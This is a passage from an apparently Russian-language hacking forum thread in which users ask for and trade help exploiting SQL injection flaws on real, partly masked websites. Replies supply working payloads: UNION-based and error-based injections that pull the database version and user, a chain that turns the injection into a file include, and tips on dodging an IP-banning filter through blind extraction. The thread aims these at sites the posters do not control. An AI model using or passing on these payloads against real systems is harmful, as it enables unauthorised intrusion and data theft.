Старый 17.02.2012, 13:31   #1741
Nightmare
Banned
 
Регистрация: 06.07.2010
Сообщений: 162
Репутация: 10
По умолчанию

Довольно странная SQL:
http://www.***.ru/index.php?id=3'
Запросы обрамляются в кавычки, а сами кавычки в параметрах экранируются, вроде бы всё должно быть ок, но при подставке кавычки вылезает SQL.
Что это, глюк? Или возможно раскрутить? У меня лично раскрутить не получилось.

PS: эту тоже не получается раскрутить:
http://www.***.ru/eng/news/archive/index.php?id=44'
Если кто поможет, буду признателен, тут вроде бы преград нету.

Последний раз редактировалось Twost; 21.08.2013 в 15:12..
Nightmare вне форума   Ответить с цитированием
Старый 17.02.2012, 14:05   #1742
Ereeee
 
Аватар для Ereeee
 
Регистрация: 19.01.2012
Сообщений: 110
Репутация: 12
По умолчанию

http://***.ru/index.php?id=1&ibID=6&region=3&country=68&city=-445+union+select+version()

P.S. В первом сначала идет INSERT запрос, потом твой IP попадает в базу. После идет UPDATE запрос.

Последний раз редактировалось Twost; 21.08.2013 в 15:12..
Ereeee вне форума   Ответить с цитированием
Старый 17.02.2012, 14:31   #1743
Ereeee
 
Аватар для Ereeee
 
Регистрация: 19.01.2012
Сообщений: 110
Репутация: 12
По умолчанию

Цитата:
Сообщение от faza02 Посмотреть сообщение
вторую вряд ли раскрутишь
Почему?
Ereeee вне форума   Ответить с цитированием
Старый 17.02.2012, 16:43   #1744
~d0s~
 
Регистрация: 03.08.2010
Сообщений: 45
Репутация: 26
По умолчанию

Цитата:
Сообщение от Nightmare Посмотреть сообщение
PS: эту тоже не получается раскрутить:
http://www.***.ru/eng/news/archive/index.php?id=44'
Если кто поможет, буду признателен, тут вроде бы преград нету.
http://www.***.ru/eng/news/archive/index.php?id=44'and(select(1)from(select/**/count(0),concat((select(concat_ws(0x3b,version(),u ser()))),floor(rand(0)*2))from(information_schema. tables)/**/group/**/by/**/2)a)/**/and'

Последний раз редактировалось Twost; 21.08.2013 в 15:12..
~d0s~ вне форума   Ответить с цитированием
Старый 17.02.2012, 16:56   #1745
Boolean
 
Регистрация: 19.10.2011
Сообщений: 111
Репутация: 34
По умолчанию

Цитата:
Сообщение от Nightmare Посмотреть сообщение
Довольно странная SQL:
http://www.***.ru/index.php?id=3'
Запросы обрамляются в кавычки, а сами кавычки в параметрах экранируются, вроде бы всё должно быть ок, но при подставке кавычки вылезает SQL.
Что это, глюк? Или возможно раскрутить? У меня лично раскрутить не получилось.

PS: эту тоже не получается раскрутить:
http://www.***.ru/eng/news/archive/index.php?id=44'
Если кто поможет, буду признателен, тут вроде бы преград нету.
Код:
http://www.***.ru/index.php?id=lolwut%27/**/a\
Код:
SELECT `TEMPLATE` FROM ailavia_menu_elements WHERE `ID`='lolwut\'/**/a\\' OR `LINK`='index.php?id=lolwut%27/**/a\'
там не декодируется URL. Если твоя кавычка там идет как %27, то для firefox подойдет это. в опере \ отправляется как %5C, ошибки не увидишь. либо тоже как-то патчить.

Далее.
Код:
http://www.***.ru/index.php?id=lolwut'/**/and/**/1=2/**/union/**/select/**/0x27/**/from/**/information_schema.tables/**/where/**/1='1
Код:
SELECT `NAME` FROM ailavia_templates WHERE `ID`='''
Код:
http://www.***.ru/index.php?id=lolwut%27/**/and/**/1=2/**/union/**/select/**/%27\%27/**/and/**/1=2/**/union/**/select/**/123/**/from/**/information_schema.tables/**/where/**/1=\%271%27/**/from/**/information_schema.tables/**/where/**/1=%271
Код:
Warning: include(/home/aqq8941/public_html/templates/123/footer.php)
123
Да тут же Инклуд через скулю!
Дальше думаю сам)
__________________
|

Последний раз редактировалось Twost; 21.08.2013 в 15:12..
Boolean вне форума   Ответить с цитированием
Старый 17.02.2012, 23:35   #1746
Nightmare
Banned
 
Регистрация: 06.07.2010
Сообщений: 162
Репутация: 10
По умолчанию

Ещё одна нестандартная SQL:
http://www.***.com/product_info.php?products_id=5572'
Значит тут он и запрос сам палит:
Код:
select ac.slave_id, po.products_options_name, pd.products_name, p.products_price,p.products_tax_class_id,p.products_status 
from accessories ac left join products p on (ac.slave_id = p.products_id) 
left join products_description pd on (ac.slave_id = pd.products_id) left join products_options po using 
(products_options_id) where ac.master_id = '5572'' and po.language_id = 1 order by po.products_options_name,ac.sort_order ...дальше неинтересно...
При любой попытке раскрутить - банит айпи, и больше с него ничего нельзя сделать, мучался долго, он почти все ноды тора перебанил, так и не смог обойти фильтр, кто сможет обойти, будет интересно посмотреть как данная вещь обходится.

Последний раз редактировалось Twost; 21.08.2013 в 15:12..
Nightmare вне форума   Ответить с цитированием
Старый 18.02.2012, 19:24   #1747
Boolean
 
Регистрация: 19.10.2011
Сообщений: 111
Репутация: 34
По умолчанию

Цитата:
Сообщение от Nightmare Посмотреть сообщение
Ещё одна нестандартная SQL:
http://www.***.com/product_info.php?products_id=5572'
Значит тут он и запрос сам палит:
Код:
select ac.slave_id, po.products_options_name, pd.products_name, p.products_price,p.products_tax_class_id,p.products_status 
from accessories ac left join products p on (ac.slave_id = p.products_id) 
left join products_description pd on (ac.slave_id = pd.products_id) left join products_options po using 
(products_options_id) where ac.master_id = '5572'' and po.language_id = 1 order by po.products_options_name,ac.sort_order ...дальше неинтересно...
При любой попытке раскрутить - банит айпи, и больше с него ничего нельзя сделать, мучался долго, он почти все ноды тора перебанил, так и не смог обойти фильтр, кто сможет обойти, будет интересно посмотреть как данная вещь обходится.
/select/is если попадает под такую регулярку - сразу бан(приблизительно на пару часов)
__________________
|

Последний раз редактировалось Twost; 21.08.2013 в 15:13..
Boolean вне форума   Ответить с цитированием
Старый 18.02.2012, 19:32   #1748
Nightmare
Banned
 
Регистрация: 06.07.2010
Сообщений: 162
Репутация: 10
По умолчанию

Цитата:
Сообщение от Boolean Посмотреть сообщение
/select/is если попадает под такую регулярку - сразу бан(приблизительно на пару часов)
Спс, как я понял, обойти нереал?
Nightmare вне форума   Ответить с цитированием
Старый 19.02.2012, 11:57   #1749
Boolean
 
Регистрация: 19.10.2011
Сообщений: 111
Репутация: 34
По умолчанию

Цитата:
Сообщение от Nightmare Посмотреть сообщение
Спс, как я понял, обойти нереал?
Ну можно вытащить системную информацию, например пользователь, база данных, система, и т.п.
раскручивать как слепую, and 5=substr(version(),1,1) и так далее.
там еще и по union бан выдается.
__________________
|
Boolean вне форума   Ответить с цитированием
Старый 19.02.2012, 13:58   #1750
Nightmare
Banned
 
Регистрация: 06.07.2010
Сообщений: 162
Репутация: 10
По умолчанию

Цитата:
Сообщение от Boolean Посмотреть сообщение
Ну можно вытащить системную информацию, например пользователь, база данных, система, и т.п.
раскручивать как слепую, and 5=substr(version(),1,1) и так далее.
там еще и по union бан выдается.
Окей, понял спасибо.
Nightmare вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2022, Jelsoft Enterprises Ltd. Перевод: zCarot